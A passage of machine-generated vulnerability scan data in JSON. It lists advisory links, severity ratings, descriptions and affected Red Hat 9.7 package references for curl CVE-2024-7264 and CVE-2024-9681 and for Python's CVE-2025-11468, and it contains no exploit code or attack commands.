"url": "https://bugzilla.redhat.com/2318914" }, { "url": "https://bugzilla.redhat.com/2318922" }, { "url": "https://bugzilla.redhat.com/2318923" }, { "url": "https://bugzilla.redhat.com/2318925" }, { "url": "https://bugzilla.redhat.com/2318926" }, { "url": "https://bugzilla.redhat.com/2318927" }, { "url": "https://bugzilla.redhat.com/2331191" }, { "url": "https://bugzilla.redhat.com/2339218" }, { "url": "https://bugzilla.redhat.com/2339220" }, { "url": "https://bugzilla.redhat.com/2339221" }, { "url": "https://bugzilla.redhat.com/2339226" }, { "url": "https://bugzilla.redhat.com/2339231" }, { "url": "https://bugzilla.redhat.com/2339236" }, { "url": "https://bugzilla.redhat.com/2339238" }, { "url": "https://bugzilla.redhat.com/2339243" }, { "url": "https://bugzilla.redhat.com/2339247" }, { "url": "https://bugzilla.redhat.com/2339252" }, { "url": "https://bugzilla.redhat.com/2339259" }, { "url": "https://bugzilla.redhat.com/2339266" }, { "url": "https://bugzilla.redhat.com/2339270" }, { "url": "https://bugzilla.redhat.com/2339271" }, { "url": "https://bugzilla.redhat.com/2339275" }, { "url": "https://bugzilla.redhat.com/2339277" }, { "url": "https://bugzilla.redhat.com/2339281" }, { "url": "https://bugzilla.redhat.com/2339284" }, { "url": "https://bugzilla.redhat.com/2339291" }, { "url": "https://bugzilla.redhat.com/2339293" }, { "url": "https://bugzilla.redhat.com/2339295" }, { "url": "https://bugzilla.redhat.com/2339299" }, { "url": "https://bugzilla.redhat.com/2339300" }, { "url": "https://bugzilla.redhat.com/2339304" }, { "url": "https://bugzilla.redhat.com/2339305" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305" }, { "url": "https://curl.se/docs/CVE-2024-7264.html" }, { "url": "https://curl.se/docs/CVE-2024-7264.json" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559" }, { "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html" }, { "url": "https://errata.rockylinux.org/RLSA-2025:1671" }, { "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519" }, { "url": "https://hackerone.com/reports/2629968" }, { "url": "https://linux.oracle.com/cve/CVE-2024-7264.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264" }, { "url": "https://security.netapp.com/advisory/ntap-20240828-0008/" }, { "url": "https://security.netapp.com/advisory/ntap-20241025-0006/" }, { "url": "https://security.netapp.com/advisory/ntap-20241025-0010/" }, { "url": "https://ubuntu.com/security/notices/USN-6944-1" }, { "url": "https://ubuntu.com/security/notices/USN-6944-2" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264" }, { "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL" } ], "published": "2024-07-31T08:15:02+00:00", "updated": "2025-11-03T23:17:31+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2024-9681", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 3.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 697 ], "description": "When curl is asked to use HSTS, the expiry time for a subdomain might\noverwrite a parent domain's cache entry, making it end sooner or later than\notherwise intended.\n\nThis affects curl using applications that enable HSTS and use URLs with the\ninsecure `HTTP://` scheme and perform transfers with hosts like\n`x.example.com` as well as `example.com` where the first host is a subdomain\nof the second host.\n\n(The HSTS cache either needs to have been populated manually or there needs to\nhave been previous HTTPS accesses done as the cache needs to have entries for\nthe domains involved to trigger this problem.)\n\nWhen `x.example.com` responds with `Strict-Transport-Security:` headers, this\nbug can make the subdomain's expiry timeout *bleed over* and get set for the\nparent domain `example.com` in curl's HSTS cache.\n\nThe result of a triggered bug is that HTTP accesses to `example.com` get\nconverted to HTTPS for a different period of time than what was asked for by\nthe origin server. If `example.com` for example stops supporting HTTPS at its\nexpiry time, curl might then fail to access `http://example.com` until the\n(wrongly set) timeout expires. This bug can also expire the parent's entry\n*earlier*, thus making curl inadvertently switch back to insecure HTTP earlier\nthan otherwise intended.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-9681" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/10" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/11" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/12" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/13" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/4" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/5" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/8" }, { "url": "http://seclists.org/fulldisclosure/2025/Apr/9" }, { "url": "http://www.openwall.com/lists/oss-security/2024/11/06/2" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-9681" }, { "url": "https://curl.se/docs/CVE-2024-9681.html" }, { "url": "https://curl.se/docs/CVE-2024-9681.json" }, { "url": "https://github.com/advisories/GHSA-g337-g667-mjvw" }, { "url": "https://hackerone.com/reports/2764830" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9681" }, { "url": "https://security.netapp.com/advisory/ntap-20241213-0006" }, { "url": "https://security.netapp.com/advisory/ntap-20241213-0006/" }, { "url": "https://ubuntu.com/security/notices/USN-7104-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-9681" } ], "published": "2024-11-06T08:15:03+00:00", "updated": "2025-11-03T21:18:48+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-11468", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 93 ], "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-11468" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-11468" }, { "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094" }, { "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2" }, { "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6" }, { "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66" }, { "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0" }, { "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796" }, { "url": "https://github.com/python/cpython/issues/143935" }, { "url": "https://github.com/python/cpython/pull/143936" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468" }, { "url": "https://ubuntu.com/security/notices/USN-8018-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468" } ], "published": "2026-01-20T22:15:50+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": 